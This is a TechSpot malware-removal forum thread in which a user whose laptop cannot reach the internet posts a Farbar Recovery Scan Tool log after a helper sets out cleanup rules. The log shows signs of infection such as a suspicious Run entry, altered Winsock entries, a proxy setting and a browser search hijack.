TechSpot

Virus won't let my laptop connect to internet

By hersheychoco
Jan 5, 2016
  1. I've already tried the proxy setting and I've already tried to reset my host file. I scanned my computer at first and ASC was able to stop the virus from blocking my firewall settings so I was able to change them but I still cannot connect to the internet. Please someone help, I need this laptop for school :(
     
  2. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    Welcome aboard [​IMG]

    Please, complete all steps listed here: http://www.techspot.com/vb/topic58138.html
    Make sure, you PASTE all logs. If some log exceeds 50,000 characters post limit, split it between couple of replies.
    Attached logs won't be reviewed.

    Please, observe following rules:
    • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
    • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
     
  3. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    FRST.txt
    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-12-2015
    Ran by hersheychoco9 (administrator) on CHOCOYAUTJA (05-01-2016 17:08:26)
    Running from D:\Utilities
    Loaded Profiles: hersheychoco9 (Available Profiles: hersheychoco9 & Administrator)
    Platform: Windows 8.1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: IE)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
    (Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (IObit) C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
    (Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSRTSrv.rse
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSUpdSrv.rse
    (Paltiosoft Inc.) C:\Program Files (x86)\SoftDenchi\UCManSvc.exe
    (Wondershare) C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
    (Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
    (Microsoft Corporation) C:\WINDOWS\System32\SkyDrive.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
    (Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
    (Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
    (Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Microsoft Corporation) C:\WINDOWS\System32\InputMethod\JPN\JpnIME.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
    (Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
    (Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxtray.exe
    (Intel Corporation) C:\WINDOWS\System32\hkcmd.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxsrvc.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxpers.exe
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSAgent.rse
    (Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
    (Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
    (Wondershare) C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\Roboscan.rse
    (Microsoft Corporation) C:\WINDOWS\System32\SettingSyncHost.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
    () C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
    (Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
    (Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
    (SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
    (SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
    (Microsoft Corporation) C:\WINDOWS\SysWOW64\wbem\WmiPrvSE.exe
    () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
    (Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSShell.rse

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7506648 2013-12-27] (Realtek Semiconductor)
    HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1374424 2014-01-09] (Realtek Semiconductor)
    HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5789512 2014-01-15] (Dell Inc.)
    HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)
    HKLM\...\Run: [Roboscan] => c:\program files\roboscan\roboscan\RSLaunch.exe [257856 2013-11-18] (Roboscan Inc)
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508104 2015-09-04] (Adobe Systems Incorporated)
    Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [ezvtum] => rundll32.exe "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll",ezvtum <===== ATTENTION
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [CCleaner Monitoring] => C:\Users\hersheychoco9\Desktop\Utilities\CCleaner\CCleaner64.exe [8418584 2015-07-17] (Piriform Ltd)
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {4d6de65c-5455-11e4-825b-a0886955d281} - "D:\VZW_Software_upgrade_assistant.exe"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {65359199-e247-11e4-828b-a0886955d281} - "D:\HTC_Sync_Manager_PC.exe"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [788480 2014-10-28] (Microsoft Corporation)
    HKU\S-1-5-18\...\Run: [] => 0
    HKU\S-1-5-18\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
    ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MobileGo Service.lnk [2015-10-29]
    ShortcutTarget: MobileGo Service.lnk -> C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe (Wondershare)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Roboscan Internet Security [2014-10-10] ()
    Startup: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2015-05-14]
    ShortcutTarget: Curse.lnk -> C:\Users\hersheychoco9\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
    BootExecute: autocheck autochk * bootroboscan.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    ProxyServer: [S-1-5-21-1030869394-3123877279-975090705-1001] => http=127.0.0.1:8800
    Winsock: Catalog9 01 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 02 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 03 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 04 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9 16 C:\Windows\system32\Comvud.dll No File
    Winsock: Catalog9-x64 01 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Winsock: Catalog9-x64 02 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Winsock: Catalog9-x64 03 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Winsock: Catalog9-x64 04 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Winsock: Catalog9-x64 16 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72}: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734}: [NameServer] 208.87.151.17,208.87.151.16
    Tcpip\..\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734}: [DhcpNameServer] 75.75.76.76 75.75.75.75

    Internet Explorer:
    ==================
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> DefaultScope {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
    SearchScopes: HKU\S-1-5-21-1030869394-3123877279-975090705-1001 -> {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
    BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll [2015-09-21] (IObit)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-06] (Oracle Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

    FireFox:
    ========
    FF ProfilePath: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default
    FF Homepage: user_pref("browser.startup.homepage","hxxp://www.only-search.com/?babsrc=HP_kms&affID=970000014");
    FF SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)");: user_pref("browser.search.selectedEngine","Search The Web (Only-Search)");
    FF DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)");: user_pref("browser.search.defaultenginename","Search The Web (Only-Search)");
    FF Keyword.URL: user_pref("keyword.URL","hxxp://www.only-search.com/?babsrc=KW_kms&affID=$afltId$&q=");
    FF NewTab: user_pref("browser.newtab.url","hxxp://www.only-search.com/?babsrc=NT_kms&affID=970000014");
    FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2015-09-17] (Adobe Systems)
    FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-18] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-18] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-06] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-06] (Oracle Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2015-09-17] (Adobe Systems)
    FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
    FF user.js: detected! => C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\user.js [2015-12-29]
    FF SearchPlugin: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml [2015-12-28]
    FF HKLM\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
    FF HKLM-x32\...\Firefox\Extensions: [jid1-xNAj4KGyf5wyhg@jetpack] - C:\Program Files (x86)\Faster Web\faster-web.xpi => not found
    FF HKLM-x32\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found

    Chrome:
    =======
    CHR Profile: C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Docs) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-28]
    CHR Extension: (Google Drive) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-28]
    CHR Extension: (YouTube) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-28]
    CHR Extension: (Google Search) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-28]
    CHR Extension: (Gmail) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-28]
    CHR Extension: (Pool Component) - C:\Users\hersheychoco9\AppData\Local\Pool Component\Component [2016-01-05]
    CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-23] (Adobe Systems Incorporated)
    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [669872 2015-09-15] (Adobe Systems Incorporated)
    S2 AdvancedSystemCareService8; D:\Utilities\Advanced SystemCare 8\ASCService.exe [814880 2015-04-03] (IObit)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2016448 2015-11-25] (Adobe Systems, Incorporated)
    R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
    R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
    S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [139328 2014-02-19] (Aviata, Inc.)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
    S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-18] (Intel Corporation)
    R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2909472 2015-07-29] (IObit)
    S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2013-10-11] ()
    R2 Roboscan_RTSrv; C:\Program Files\Roboscan\Roboscan\RSRTSrv.rse [439104 2013-11-18] (Roboscan Inc)
    R2 Roboscan_UpdSrv; C:\Program Files\Roboscan\Roboscan\RSUpdSrv.rse [842048 2013-11-18] (Roboscan Inc)
    R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
    R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1924328 2014-09-18] (SoftThinks SAS)
    R2 UCManSvc; C:\Program Files (x86)\SoftDenchi\UCManSvc.exe [241808 2010-03-12] (Paltiosoft Inc.) [File not signed]
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
    R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe [356352 2015-09-23] (Wondershare) [File not signed]
    R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [656664 2014-08-19] (Wacom Technology, Corp.)
    R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3671792 2013-10-11] (Intel® Corporation)
    S2 NetprotAdp; no ImagePath
    S2 SushiLeadsUpdaterService; no ImagePath
    S2 Update Simple for You; no ImagePath
    S2 WajaNetEn Monitor; no ImagePath
    S3 WsDrvInst; no ImagePath
     
  4. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [131328 2014-10-08] (Microsoft Corporation)
    R3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [32768 2014-10-08] (Microsoft Corporation)
    R3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [140600 2013-07-22] (Motorola Solutions, Inc.)
    R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1408824 2013-10-18] (Motorola Solutions, Inc.)
    S3 DDDriver; C:\Windows\system32\drivers\DDDriver64Dcsa.sys [23760 2015-01-30] (Dell Computer Corporation)
    S3 DellProf; C:\Windows\system32\drivers\DellProf.sys [23312 2015-01-30] (Dell Computer Corporation)
    R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-24] (OSR Open Systems Resources, Inc.)
    S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
    R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [142280 2013-10-19] (Intel Corporation)
    S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2015-12-29] (Malwarebytes)
    R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100824 2013-12-18] (Intel Corporation)
    R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3607520 2013-10-14] (Intel Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
    R3 RoboFww; c:\program files\roboscan\roboscan\plugin\realtime\RoboFww.sys [35616 2013-11-18] (Roboscan Inc)
    R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [41200 2014-01-16] (Synaptics Incorporated)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
    S3 WinRing0_1_2_0; C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [14544 2010-11-01] (OpenLibSys.org)
    S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
    S1 cherimoya; system32\drivers\cherimoya.sys [X]
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S3 iscFlash; \??\C:\Users\HERSHE~1\AppData\Local\Temp\7zS2B1B.tmp\iscflashx64.sys [X]
    S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; \??\c:\program files\dell\supportassist\pcdsrvc_x64.pkms [X]
    S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]
    S1 {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64; system32\drivers\{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-05 17:08 - 2016-01-05 17:08 - 00000000 ____D C:\FRST
    2015-12-29 16:23 - 2015-12-29 16:23 - 00806882 _____ C:\Users\hersheychoco9\Desktop\UsbFix_Report.txt
    2015-12-29 16:11 - 2015-12-29 16:11 - 00002860 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
    2015-12-29 16:06 - 2015-12-29 16:06 - 18823680 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
    2015-12-29 16:06 - 2015-12-29 16:06 - 15159296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
    2015-12-29 16:06 - 2015-12-29 16:06 - 02476376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
    2015-12-29 16:06 - 2015-12-29 16:06 - 00428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
    2015-12-29 16:05 - 2015-12-29 16:24 - 00000000 ____D C:\Users\hersheychoco9\Desktop\Utilities
    2015-12-29 16:05 - 2015-12-29 16:05 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
    2015-12-29 16:05 - 2015-12-29 16:05 - 00487256 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
    2015-12-29 16:05 - 2015-12-29 16:05 - 00393560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll
    2015-12-29 16:04 - 2015-12-29 16:04 - 06521800 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
    2015-12-29 16:04 - 2015-12-29 16:04 - 01488000 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
    2015-12-29 16:04 - 2015-12-29 16:04 - 01201664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
    2015-12-29 16:04 - 2015-12-29 16:04 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
    2015-12-29 16:04 - 2015-12-29 16:04 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
    2015-12-29 16:04 - 2015-12-29 16:04 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
    2015-12-29 16:02 - 2015-12-29 16:02 - 02819584 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers.dll
